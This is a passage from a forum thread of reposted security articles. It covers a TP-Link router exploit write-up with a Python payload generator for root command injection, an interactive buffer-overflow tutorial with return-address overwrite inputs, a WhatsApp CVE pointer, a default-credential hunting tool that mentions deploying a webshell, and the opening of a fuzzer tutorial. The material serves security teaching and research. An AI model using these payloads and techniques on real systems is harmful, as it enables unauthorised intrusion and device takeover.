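            payloads.append("printf %s>>z" % ch)   # e.g. "printf a>>z" (11 bytes)
        else:
            payloads.append("printf '%s'>x" % ch)  # stage digits/specials in a fresh file (12 bytes)
            payloads.append("cat x*>>z*")          # then append them via the '*' glob (10 bytes)
    payloads.append("sh z")                        # finally run the command file
    return payloads
```

Each returned string is one trigger of the bug; every one fits within the 12-byte budget described above.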
Had it been mounted read-only, as is normal in most embedded devices that use the SquashFS filesystem, this particular attack would have been impossible, as adding cd tmp would consume too many of the available 12 characters. And with this, we have all the tools we need to execute arbitrary commands. We send the command byte by byte, adding them to a command file ‘z’, and then we send the payload: sh z and our command file gets executed as root. From here on, we can download and execute a binary, and we have full control of the router. Users of TP-Link routers with support questions can email support.email@tp-link.com. Thanks again to Pedro and Radek for providing this great write-up. This duo has competed in multiple Pwn2Own competitions, including winning $75,000 at this year’s Pwn2Own Miami event. We certainly hope to see more from them in future competitions. Until then, follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo
  18. Interactive guide to Buffer Overflow exploitation December 16, 2019 Written by: Vetle Økland A Buffer Overflow is a bug class in a program typically written in a memory-unsafe language like C or C++. Buffer Overflow bugs triggered by user input can often allow someone to overwrite data in memory they weren't supposed to. Before we dive into how to exploit Buffer Overflow bugs, we will do a quick introduction to Assembly. Assembly is a language that describes raw machine code. Assembly is the lowest level programming language, and the processor executes exactly what you write in Assembly. This means that we can also directly translate machine code bits and bytes back to Assembly without losing any information. Languages like C, C++, Rust, etc. on the other hand translate what you write to machine code, which we can translate back to Assembly, but we can't translate it back to exactly what the code was in C, C++ or Rust, only approximations based on the Assembly. For all intents and purposes, Assembly is the exact code that the processor executes. Let's jump into a little interactive primer on Assembly. First of all, in Assembly we don't really have variables in the sense that we have in JavaScript, C, Rust, Go, etc. Instead, we have a fixed set of registers, each of which can store one value at a time. On a 64-bit system, these registers can store up to 64 bits of values (e.g. numbers from 0 to 18 446 744 073 709 551 615), on a 32-bit system registers can store up to 32 bits of values (0 to 4 294 967 295). Some of the registers in Intel architectures are named RAX, RDI, and RBX; these are general-purpose registers that you can pretty much use for whatever you want. Then there are others like RIP and RSP, which hold the memory address of the next instruction to execute and the address of the top of the stack (more on that later), respectively. Underneath you will see what happens when we execute mov {register}, {value} instructions. 
mov is a "command" that tells the processor to store (or "move") values into a register or memory address. When you step through the program you can see that for each mov instruction the register updates with the value specified in the mov instruction. Most values in these examples are represented as HEX values. main: 0xFA2 mov eax, 0x1337 0xFA7 mov ebx, 0x7331 0xFAC mov edi, 0x1995 0xFB1 call exit RAX0x00000000RBX0x00000000RDI0x00000000 Note that eax refers to the lower 32 bits of the rax register. You can read about that here if you're interested in learning more about it. Most processor architectures have a concept of a "stack". The stack is a quick place to store temporary values in memory (RAM). 64-bit systems store 64 bits (8 bytes) at a time in a growing stack, and when you go to fetch the values you fetch them 64 bits at a time, or 8 bytes. You store a value on the stack by using instruction push {register name} and you fetch a value into a register by using instruction pop {register name}. There is a special register RSP that has the value (pointer) of the memory address of the last value on the stack. This means RSP should always point to the last value you pushed to the stack. If you push (store) a value onto the stack, RSP decreases by 8, and if you pop (fetch) a value, RSP increases by 8, because the stack grows toward lower addresses and we always push and pop values in 8-byte steps. main: 0xFA9 mov eax, 0x13371337 0xFAE push rax 0xFAF pop rdi 0xFB0 call exit RAX0x00000000RDI0x00000000RSP0x00005000 Here we set RAX to the HEX value 0x13371337, we push that value to the stack and then pop it into RDI. On the right side underneath the registers you can see the stack, each box is 1 byte, each row is 1 8-byte value. On the top of each box you can see the memory address of the byte, on the bottom is the byte's value and in the middle you can see the ASCII representation of the value. Here's how it looks if you push and pop multiple values. 
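Here is a tiny Python model of those push/pop mechanics (a sketch for intuition, not the emulator's actual code); note that pushing moves RSP down and popping moves it back up:

```python
class MiniStack:
    """Models x86-64 push/pop: the stack grows toward lower addresses."""
    def __init__(self, rsp=0x5000):
        self.rsp = rsp
        self.mem = {}

    def push(self, value):
        self.rsp -= 8               # make room: RSP moves down by 8
        self.mem[self.rsp] = value  # store the value at the new top of the stack

    def pop(self):
        value = self.mem[self.rsp]  # fetch the last value pushed
        self.rsp += 8               # RSP moves back up by 8
        return value
```

Pushing 0x13371337 from an initial RSP of 0x5000 leaves RSP at 0x4FF8; popping it restores RSP to 0x5000, just like the emulator's stack view shows.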
main: 0xFA5 mov eax, 0x13371337 0xFAA push rax 0xFAB push rax 0xFAC push rax 0xFAD pop rdi 0xFAE pop rbx 0xFAF pop rsi 0xFB0 call exit RAX0x00000000RDI0x00000000RBX0x00000000RSI0x00000000RSP0x00005000 There's another special register called RIP that always points to the memory address of the next instruction the processor is going to execute. This register cannot be changed with mov instructions, but we can use jmp instructions instead. This allows us to jump to different places in the program when we need to. add1: 0xFA5 add rax, 1 0xFA9 jmp add2 main: 0xFAB mov eax, 1 0xFB0 jmp add1 add2: 0xFB2 add rax, 2 0xFB6 jmp add1 RAX0x00000000RIP0x00000fab When we jump to "add2" we add 2 to the current value of RAX; when we jump to add1 we add 1. The emulator has conveniently labeled addresses for us, so instead of seeing jmp 0xFA5, it's changed to the more readable jmp add1. The labels in the assembly view are for convenience, but when the processor executes the code, it neither needs nor cares about the labels. This means that the label add1 is for address 0xFA5, main is for address 0xFAB and add2 is for address 0xFB2. Another way to jump to another place in the code is to use a call {address} instruction. A call instruction basically pushes the address of the next instruction after the call instruction to the stack, then jumps to the specified address. The counterpart to call is ret, which pops the last value on the stack and jumps (returns) to that address. This lets pieces of code act as functions that you can call, return from when they're done, and then continue normal execution. Functions we often want to call do things like print something on the screen, transform text, etc., just like the functions you use in other programming languages. 
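The call/ret mechanics can be modeled with a few lines of Python (again a sketch for intuition, with made-up addresses, not the emulator's code): call pushes the address of the following instruction before jumping, and ret pops it to resume execution there.

```python
def run(program, entry):
    """program maps address -> (op, arg); returns the order in which addresses executed."""
    addrs = sorted(program)
    stack, rip, trace = [], entry, []
    while True:
        op, arg = program[rip]
        trace.append(rip)
        nxt_idx = addrs.index(rip) + 1
        nxt = addrs[nxt_idx] if nxt_idx < len(addrs) else None
        if op == "call":
            stack.append(nxt)   # save the return address (next instruction) on the stack
            rip = arg
        elif op == "ret":
            rip = stack.pop()   # resume right after the matching call
        elif op == "exit":
            return trace
        else:                   # anything else (e.g. mov) just falls through
            rip = nxt

# main at 0x10 calls a function at 0x30, which returns to 0x18
program = {
    0x10: ("call", 0x30), 0x18: ("exit", None),
    0x30: ("mov", 0x42),  0x38: ("ret", None),
}
```

Running run(program, 0x10) executes 0x10, jumps into 0x30, falls through to the ret at 0x38, and resumes at 0x18, exactly the stack-grow-and-shrink pattern the interactive examples show.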
main: 0xF9D mov eax, 0x666 _loop: 0xFA2 call sub1 0xFA7 call add2 0xFAC jmp _loop add2: 0xFAE add rax, 2 0xFB2 ret sub1: 0xFB3 sub rax, 1 0xFB7 ret RAX0x00000000RIP0x00000f9dRSP0x00005000 Calls can also be nested, and you should see the stack grow and shrink as calls and returns are being executed. main: 0xF93 call call1 0xF98 call exit call1: 0xF9D call call2 0xFA2 ret call2: 0xFA3 call call3 0xFA8 ret call3: 0xFA9 call call4 0xFAE ret call4: 0xFAF mov eax, 0x42 0xFB4 ret RAX0x00000000RIP0x00000f93RSP0x00005000 We can also call functions with arguments, but we cannot do that inline in a call instruction, we need to either use the stack or the registers. For functions with few parameters we use registers for the first argument, the second, and the third. If we want to print something, we can use the printf function with the memory address of the string we want to print in the RDI register. To load the memory address into RDI we need to use the lea instruction, for our intents and purposes you can think of lea as a fancy mov. When we run the lea instruction in the emulator you can see that RDI is updated to 0x1000 which is the address of the "Hello, world!" string. main: 0xFA2 lea rdi, qword ptr [hello_world] 0xFA9 call printf 0xFAE call exit RDI0x00000000 Which registers to use for function arguments, and how many before the stack is used instead, varies a lot depending on programming language, compiler, operating system, etc. Assembly does not specify which registers must be used for arguments. Some functions also return some value, this is often in the RAX register. After we've called a function we can get the return value from the RAX register. Underneath is a little program that parrots what you input. First it prints the string "Say something: " to the screen, then it allocates 8 bytes on the stack for your input by subtracting 8 from the value of RSP. 
The read function takes two arguments, the first (in RDI) is the address of where to put the user's message, the second (in RSI) is the maximum number of bytes from user input to read. main: 0xF7C lea rdi, qword ptr [say_something] 0xF83 call print 0xF88 sub rsp, 8 0xF8C mov rdi, rsp 0xF8F mov esi, 8 0xF94 call read 0xF99 mov rax, rsp 0xF9C lea rdi, qword ptr [you_said] 0xFA3 call printf 0xFA8 call exit RDI0x00000000RSP0x00005000 When you reach the read instruction, all further execution is blocked until you press enter in the console. When running the example, you should be able to see your input (up to 8 bytes) in the stack visualization, each character represented in their own "boxes". printf in this case takes the first format argument in RAX, so we copy the value of RSP over to RAX because the user input string is currently the last thing on the stack, and we want printf to print that string. A bug arises when user input is allowed to exceed the number of bytes we reserved for it. In the case of the last example, if RSI had been a larger number than what we subtracted from RSP before calling read, the user could have written over some previous values on the stack. In the get_name function of the example below we are allocating 0x10 (16) bytes from RSP (with sub rsp, 0x10), but when calling read we are instructing it in the RSI register to accept up to 0x18 (24) bytes into the memory location of RDI (which points at the stack). The value put on the stack before the 16 bytes allocated for user input is a return address from the call made to get_name in main. 
secret_function: 0xF52 lea rdi, qword ptr [secret_text] 0xF59 call print 0xF5E call exit main: 0xF63 call ask_name 0xF68 call get_name 0xF6D mov rax, rdi 0xF70 call welcome 0xF75 call exit ask_name: 0xF7A lea rdi, qword ptr [wassa_you_name] 0xF81 call print 0xF86 ret get_name: 0xF87 sub rsp, 0x10 0xF8B mov rdi, rsp 0xF8E mov esi, 0x18 0xF93 call read 0xF98 mov rdi, rsp 0xF9B add rsp, 0x10 0xF9F ret welcome: 0xFA0 lea rdi, qword ptr [welcome_msg] 0xFA7 call printf 0xFAC ret RDI0x00000000RSP0x00005000 In this example there is a function called secret_function that is not called anywhere in normal execution. However, because of the buffer overflow it is possible to "return" to that function by first writing 16 bytes of whatever you want followed by 8 bytes that represent the address you want to return to. For example, if I wanted to go directly to call exit at address 0xF75, I would input AAAAAAAAAAAAAAAA\x00\x00\x00\x00\x00\x00\x0f\x75 into the console when prompted for input. By prepending \x to a hexadecimal, you input that byte directly, so \x41 is the byte for the ASCII character A, and \x00 is just a null byte. The secret_function starts at address 0xf52; you should be able to edit my example input to jump to that function. The last example is more complex than the previous examples. This program generates a random password each time it starts and requires you to input the right one to "log in". You'll find that in the enter_password function read is being given more space than was allocated on the stack. Try to bypass the login function and get to say_success. 
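Rather than typing the escapes by hand, the 24-byte input above can be assembled with a short script. The big-endian packing here mirrors the byte order of the article's example input (the author notes later that the emulator does not follow Intel's little-endian convention); on real x86-64 you would pack the address little-endian instead.

```python
import struct

def overflow_input(target_addr, pad_len=16):
    # 16 filler bytes for the buffer, then the 8 bytes overwriting the saved return address
    # (big-endian to match the emulator's byte ordering, not real x86)
    return b"A" * pad_len + struct.pack(">Q", target_addr)

payload = overflow_input(0xF52)  # aim the saved return address at secret_function
```

Swapping 0xF52 for 0xF75 reproduces the "jump straight to call exit" input shown above.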
main: 0xE80 call boot_up 0xE85 call exit say_success: 0xE8A lea rdi, qword ptr [_loggedin_msg] 0xE91 call print 0xE96 call exit say_wrong: 0xE9B lea rdi, qword ptr [wrong_pass_msg] 0xEA2 call print 0xEA7 ret enter_password: 0xEA8 lea rdi, qword ptr [enter_pass_msg] 0xEAF call print 0xEB4 sub rsp, 0x10 0xEB8 mov rdi, rsp 0xEBB mov esi, 0x20 0xEC0 call read 0xEC5 lea rsi, qword ptr [password_ptr] 0xECC mov rsi, qword ptr [rsi] 0xECF mov edx, 0x10 0xED4 call strncmp 0xED9 add rsp, 0x10 0xEDD ret boot_up: 0xEDE lea rdi, qword ptr [booting_msg] 0xEE5 call print 0xEEA call integrity_check 0xEEF lea rdi, qword ptr [welcome_msg] 0xEF6 call print password_loop: 0xEFB call enter_password 0xF00 cmp rax, 0 0xF04 je say_success 0xF06 call say_wrong 0xF0B jmp password_loop 0xF0D ret integrity_check: 0xF0E push rdi 0xF0F lea rdi, qword ptr [password_ptr] 0xF16 mov edi, 0x10 0xF1B call malloc 0xF20 mov rdi, rax 0xF23 call create_random_password 0xF28 lea rax, qword ptr [password_ptr] 0xF2F mov qword ptr [rax], rdi 0xF32 pop rdi 0xF33 ret RAX0x00000000RBX0x00000000RDI0x00000000 Some of the concepts in this blog post are grossly oversimplified, and we are not talking about any mitigations to these types of attacks at all. These types of attacks have worked well in the past, but due to mitigations such as ASLR, DEP, Stack Canaries, and more recently Pointer Authentication, modern binary exploitation requires a lot more effort from the attacker. I have not touched endianness because I only see it as adding unnecessary complexity that isn't really relevant to the exercises. In fact, the emulator actually handles endianness wrong, according to the Intel specifications. Normally, in a situation where you can control the instruction pointer and DEP is not present (e.g. you can execute code on the stack or other writable memory) you would just write your own custom code there and jump to it. 
That gives you a lot of freedom in terms of how to attack, but with DEP enabled you instead have to create a ROP chain. We have another interactive tutorial on ROP that you might want to look at. I'd love some feedback over on Twitter @bordplate. Or you can check out the code for the emulator on GitHub. Sursa + Interactiv: https://nagarrosecurity.com/blog/interactive-buffer-overflow-exploitation
  19. This was originally published on PerimeterX's official GitHub through my work GitHub account. Even though this is my work, all rights and legal concerns belong to PerimeterX. WhatsApp Vulnerabilities Disclosure - Open Redirect + CSP Bypass + Persistent XSS + FS read permissions + potential for RCE CVE-2019-18426 Exploit DB Technical Article Original Vulnerabilities Disclosures Documents DEMO Vids! Sursa: https://github.com/weizman/CVE-2019-18426
  20. Hunter of Default Logins (Web/HTTP) 2020-04-07 We all like them, don’t we? Those easy default credentials. Surely we do, but looking for them during penetration tests is not always fun. It’s actually hard work! Especially when we have a large environment. How can we check all those different web interfaces? Is there a viable automation? In this article we will present our HTTP default login hunter. Table Of Contents Introduction NNdefaccts alternate dataset Nmap script limitations Introducing default-http-login-hunter Additional features Fingerprint contribution Conclusion Thanks Introduction Checking administrative interfaces for weak and default credentials is a vital part of every VAPT exercise. But doing it manually can quickly become exhausting. The problem with web interfaces is that they are all different. And so to develop a universal automation that could do the job across multiple interfaces is very hard. Although there are some solutions for this, they are mostly commercial and the functionality is not even that great. Luckily there is a free and open source solution that can help us. NNdefaccts alternate dataset The NNdefaccts dataset made by nnposter is an alternate fingerprint dataset for the Nmap http-default-accounts.nse script. The NNdefaccts dataset can test more than 380 different web interfaces for default logins. For comparison, the latest Nmap 7.80 default dataset only supports 55. Here are some examples of the supported web interfaces: Network devices (3Com, Asus, Cisco, D-Link, F5, Nortel..) Video cameras (AXIS, GeoVision, Hikvision, Sanyo..) Application servers (Apache Tomcat, JBoss EAP..) Monitoring software (Cacti, Nagios, OpenNMS..) Server management (Dell iDRAC, HP iLO..) Web servers (WebLogic, WebSphere..) Printers (Kyocera, Sharp, Xerox..) IP Phones (Cisco, Polycom..) Citrix, NAS4Free, ManageEngine, VMware.. 
See the following link for a full list: https://github.com/InfosecMatter/http-default-logins/blob/master/list.txt The usage is quite simple – we simply run the Nmap script with the alternate dataset as a parameter. Like this: nmap --script http-default-accounts --script-args http-default-accounts.fingerprintfile=~/http-default-accounts-fingerprints-nndefaccts.lua -p 80 192.168.1.1 This is already pretty great as it is. Nmap script limitations Now the only caveat with this solution is that the http-default-accounts.nse script works only for web servers running on common web ports such as tcp/80, tcp/443 or similar. This is because the script contains the following port rule which matches only common web ports: So what if we find a web server running on a different port – say tcp/9999? Unfortunately the Nmap script will not run because of the port rule.. ..unless we modify the port rule in the Nmap script to match our web server port! And that’s exactly where our new tool comes in handy. Introducing default-http-login-hunter The default-http-login-hunter tool, written in Bash, is essentially a wrapper around the aforementioned technologies to unlock their full potential and to make things easy for us. The tool simply takes a URL as an argument: default-http-login-hunter.sh <URL> First it will make a local temporary copy of the http-default-accounts.nse script and it will modify the port rule so that it will match the web server port that we provided in the URL. Then it will run the Nmap command for us and display the output nicely. Here’s an example: From the above screenshot we can see that we found default credentials for Apache Tomcat running on port tcp/9999. Now we could deploy a webshell on it and obtain RCE. But that’s another story. Additional features List of URLs The tool also accepts a list of URLs as an input. So for instance, we could feed it with URLs that we extracted from Nessus scan results using our Nessus CSV parser. 
The tool will go through all the URLs one by one and check for default logins. Like this: default-http-login-hunter.sh urls.txt Here the tool found a default login to the Cisco IronPort running on port https/9443. Resume-friendly Another useful feature is that it saves all the results in the current working directory. So if it gets accidentally interrupted, it will just continue where it stopped. Like in this example: Here we found some Polycom IP phone logins. Staying up-to-date To make sure that we have the latest NNdefaccts dataset, run the update command: default-http-login-hunter.sh update And that’s pretty much it. If you want to see more detailed output, use the -v parameter in the command line. You can find the tool in our InfosecMatter Github repository here. Fingerprint contribution I encourage everyone to check out the NNdefaccts project and consider contributing with fingerprints that you found during your engagements. Contribution is not hard – you can simply record the login procedure in Fiddler, Burp or ZAP and send the session file to the author. Please see more information on the fingerprint contribution here. You may find these links useful while hunting for default logins manually: https://cirt.net/passwords https://www.routerpasswords.com/ Conclusion This tool can be of great help not only while performing internal infrastructure penetration tests, but anywhere we need to test a web interface for default credentials. Its simple design and smart features make it also very easy to use. Hope you will find it useful too! Thanks Lastly, I want to thank nnposter for his awesome NNdefaccts dataset without which this would not be possible and also for his contributions to the Nmap project. Thank you nnposter! Sursa: https://www.infosecmatter.com/hunter-of-default-logins-web-http/
  21. Fuzzing Like A Caveman 28 minute read Introduction I’ve been passively consuming a lot of fuzzing-related material in the last few months as I’ve primarily tried to up my Windows exploitation game from Noob-Level to 1%-Less-Noob-Level, and I’ve found it utterly fascinating. In this post I will show you how to create a really simple mutation fuzzer and hopefully we can find some crashes in some open source projects with it. The fuzzer we’ll be creating is from just following along with @gynvael’s fuzzing tutorial on YouTube. I had no idea that Gynvael had streams so now I have dozens more hours of content to add to the never ending list of things to watch/read. I must also mention that Brandon Faulk’s fuzzing streams are incredible. I don’t understand roughly 99% of the things Brandon says, but these streams are captivating. My personal favorites so far have been his fuzzing of calc.exe and c-tags. He also has this wonderful introduction to fuzzing concepts video here: NYU Fuzzing Talk. Picking a Target I wanted to find a binary that was written in C or C++ and parsed data from a file. One of the first things I came across was binaries that parse Exif data out of images. We also want to pick a target with virtually no security implications since I’m publishing these findings in real time. From https://www.media.mit.edu/pia/Research/deepview/exif.html, Basically, Exif file format is the same as JPEG file format. Exif inserts some of image/digicam information data and thumbnail image to JPEG in conformity to JPEG specification. Therefore you can view Exif format image files by JPEG compliant Internet browser/Picture viewer/Photo retouch software etc. as a usual JPEG image files. So Exif inserts metadata type information into images in conformity with the JPEG spec, and there exists no shortage of programs/utilities which helpfully parse this data out. 
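Before spending fuzzing cycles on a target file, it is worth sanity-checking that it actually carries Exif data. Exif lives in a JPEG APP1 segment: the marker bytes 0xFF 0xE1, a two-byte segment length, then the ASCII identifier "Exif". A minimal (and deliberately naive) check might look like this:

```python
def has_exif(data: bytes) -> bool:
    # require the JPEG SOI marker first, then scan for an APP1 segment
    # whose body starts with the "Exif" identifier
    if data[:2] != b"\xff\xd8":
        return False
    i = data.find(b"\xff\xe1")
    return i != -1 and data[i + 4:i + 8] == b"Exif"
```

This skips the two length bytes after the marker and just looks for the identifier, which is enough for triaging sample inputs.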
Getting Started We’ll be using Python3 to build a rudimentary mutation fuzzer that subtly (or not so subtly) alters valid Exif-filled JPEGs and feeds them to a parser hoping for a crash. We’ll also be working on an x86 Kali Linux distro. First thing’s first, we need a valid Exif-filled JPEG. A Google search for ‘Sample JPEG with Exif’ helpfully leads us to this repo. I’ll be using the Canon_40D.jpg image for testing. Getting to Know the JPEG and EXIF Spec Before we start just scribbling Python into Sublime Text, let’s first take some time to learn about the JPEG and Exif specification so that we can avoid some of the more obvious pitfalls of corrupting the image to the point that the parser doesn’t attempt to parse it and wastes precious fuzzing cycles. One thing to know from the previously referenced specification overview, is that all JPEG images start with byte values 0xFFD8 and end with byte values 0xFFD9. This first couple of bytes are what are known as ‘magic bytes’. This allows for straightforward file-type identification on *Nix systems. root@kali:~# file Canon_40D.jpg Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 We can take the .jpg off and get the same output. 
root@kali:~# file Canon Canon: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 If we hexdump the image, we can see the first and last bytes are in fact 0xFFD8 and 0xFFD9. root@kali:~# hexdump Canon 0000000 d8ff e0ff 1000 464a 4649 0100 0101 4800 ------SNIP------ 0001f10 5aed 5158 d9ff Another interesting piece of information in the specification overview is that ‘markers’ begin with 0xFF. There are several known static markers such as: the ‘Start of Image’ (SOI) marker: 0xFFD8 APP1 marker: 0xFFE1 generic markers: 0xFFXX the ‘End of Image’ (EOI) marker: 0xFFD9 Since we don’t want to change the image length or the file type, let’s go ahead and plan to keep the SOI and EOI markers intact when possible. We don’t want to insert 0xFFD9 into the middle of the image for example as that would truncate the image or cause the parser to misbehave in a non-crashy way. ‘Non-crashy’ is a real word. Also, this could be misguided and maybe we should be randomly putting EOI markers in the byte stream? Let’s see. Starting Our Fuzzer The first thing we’ll need to do is extract all of the bytes from the JPEG we want to use as our ‘valid’ input sample that we’ll of course mutate. Our code will start off like this: #!/usr/bin/env python3 import sys # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) If we want to see how this data looks, we can print the first 10 or so byte values in the array and see how we’ll be interacting with them. 
We’ll just temporarily add something like: else: filename = sys.argv[1] data = get_bytes(filename) counter = 0 for x in data: if counter < 10: print(x) counter += 1 Running this shows that we’re dealing with neatly converted decimal integers, which makes everything much easier in my opinion. root@kali:~# python3 fuzzer.py Canon_40D.jpg 255 216 255 224 0 16 74 70 73 70 Let’s just quickly see if we can create a new valid JPEG from our byte array. We’ll add this function to our code and run it. def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() Now that we have mutated.jpg in our directory, let’s hash the two files and see if they match. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e mutated.jpg Awesome, we have two identical files. Now we can get into the business of mutating the data before creating our mutated.jpg. Mutating We’ll keep our fuzzer relatively simple and only implement two different mutation methods. These methods will be: bit flipping overwriting byte sequences with Gynvael’s ‘Magic Numbers’ Let’s start with bit flipping. 255 (or 0xFF) in binary is 11111111. If we were to randomly flip a bit in this number, let’s say at index 2, we’d end up with 11011111. This new number would be 223 or 0xDF. I’m not entirely sure how different this mutation method is from randomly selecting a value from 0 - 255 and overwriting a random byte with it. My intuition says that bit flipping is extremely similar to randomly overwriting bytes with an arbitrary byte. Let’s go ahead and say we want to only flip a bit in 1% of the bytes we have. We can get to this number in Python by doing: num_of_flips = int((len(data) - 4) * .01) We want to subtract 4 from the length of our bytearray because we don’t want to count the first 2 bytes or the last 2 bytes in our array, as those were the SOI and EOI markers and we are aiming to keep those intact. 
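Since the whole plan hinges on keeping the SOI and EOI markers intact, a tiny helper to sanity-check any file against the magic bytes described earlier can be handy. This is just a sketch; the helper name is my own and not part of the fuzzer:

```python
# Sanity check: does a file still start with the SOI marker (0xFFD8)
# and end with the EOI marker (0xFFD9)? Helper name is hypothetical.
def has_jpeg_markers(filename):
    with open(filename, "rb") as f:
        data = f.read()
    return data[:2] == b"\xff\xd8" and data[-2:] == b"\xff\xd9"
```

Running this against mutated.jpg after a fuzzing iteration is a cheap way to confirm the mutators never clobber the markers.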
Next we’ll want to randomly select that many indexes and target those indexes for bit flipping. We’ll go ahead and create a range of possible indexes we can change and then choose num_of_flips of them to randomly bit flip. indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 Let’s add import random to our script, and also add these debug print statements to make sure everything is working correctly. print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) Our function right now looks like this: def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) If we run this, we get a nice output as expected: root@kali:~# python3 fuzzer.py Canon_40D.jpg Number of indexes chosen: 79 Indexes chosen: [6580, 930, 6849, 6007, 5020, 33, 474, 4051, 7722, 5393, 3540, 54, 5290, 2106, 2544, 1786, 5969, 5211, 2256, 510, 7147, 3370, 625, 5845, 2082, 2451, 7500, 3672, 2736, 2462, 5395, 7942, 2392, 1201, 3274, 7629, 5119, 1977, 2986, 7590, 1633, 4598, 1834, 445, 481, 7823, 7708, 6840, 1596, 5212, 4277, 3894, 2860, 2912, 6755, 3557, 3535, 3745, 1780, 252, 6128, 7187, 500, 1051, 4372, 5138, 3305, 872, 6258, 2136, 3486, 5600, 651, 1624, 4368, 7076, 1802, 2335, 3553] Next we need to actually mutate the bytes at those indexes. We need to bit flip them. I chose to do this in a really hacky way, feel free to implement your own solution. 
We’re going to convert the bytes at these indexes to binary strings and pad them so that they are 8 digits long. Let’s add this code and see what I’m talking about. We’ll be converting the byte value (which is in decimal, remember) to a binary string and then padding it with leading zeroes if it’s less than 8 digits long. The last line is a temporary print statement for debugging. for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current print(current) As you can see, we have a nice output of binary numbers as strings. root@kali:~# python3 fuzzer.py Canon_40D.jpg 10100110 10111110 10010010 00110000 01110001 00110101 00110010 -----SNIP----- Now for each of these, we’ll randomly select an index and flip it. Take the first one, 10100110: if we select index 0, we have a 1, so we’ll flip it to a 0. The last consideration for this code segment is that these are strings, not integers, remember. So the last thing we need to do is convert the flipped binary string to an integer. We’ll create an empty list, add each digit to the list, flip the digit we randomly picked, and then construct a new string from all the list members. (We have to use this intermediate list step since strings are immutable.) Finally, we convert it to an integer and return the data to our create_new() function to create a new JPEG. 
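As an aside, the whole string-conversion dance can be collapsed into a single XOR per byte: flipping the bit at position n is the same as XOR-ing with 1 << n (for example, 255 ^ (1 << 5) == 223, the 0xFF-to-0xDF flip from earlier). Here is a hypothetical alternative implementation, not the code the fuzzer below actually uses:

```python
import random

def bit_flip_xor(data):
    # Hypothetical alternative to the string-based flip above: XOR each
    # chosen byte with a mask that has exactly one randomly chosen bit set.
    num_of_flips = int((len(data) - 4) * .01)
    # random.sample guarantees unique indexes (repeated random.choice can
    # pick the same index twice)
    for x in random.sample(range(4, len(data) - 4), num_of_flips):
        data[x] ^= 1 << random.randint(0, 7)
    return data
```

Either version mutates roughly 1% of the bytes while leaving the first and last four untouched.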
Our script now looks like this in total: #!/usr/bin/env python3 import sys import random # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) mutated_data = bit_flip(data) create_new(mutated_data) Analyzing Mutation If we run our script, we can shasum the output and compare to the original JPEG. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg a7b619028af3d8e5ac106a697b06efcde0649249 mutated.jpg This looks promising as they have different hashes now. 
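Matching hashes told us the copy was faithful; differing hashes only tell us that something changed. A few lines of Python can show exactly which bytes differ, with no external tooling. A quick sketch (the function name is my own):

```python
def diff_bytes(file_a, file_b):
    # Return (offset, byte_in_a, byte_in_b) for every position where the
    # two files disagree -- a poor man's hexdump diff.
    a = open(file_a, "rb").read()
    b = open(file_b, "rb").read()
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]
```

With the bit-flip mutator, diff_bytes("Canon_40D.jpg", "mutated.jpg") should report roughly 1% of the bytes differing, each by a single bit.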
